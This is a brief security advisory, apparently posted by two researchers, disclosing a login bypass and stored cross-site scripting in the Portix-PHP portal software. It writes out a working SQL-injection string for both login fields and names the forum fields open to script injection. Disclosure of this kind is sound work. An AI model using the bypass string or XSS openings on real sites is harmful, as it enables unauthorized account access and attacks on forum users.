Portix-PHP [login bypass & xss (post)]

[saps.audit@xxxxxxxxx]

product:Portix-PHP 
vendor site :http://portix2.be
risk : medium

log with :
username: 'or''='
passwd : 'or''='

xss post on the forum , vulnerable fields  :
titre
auteur

laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@xxxxxxxxx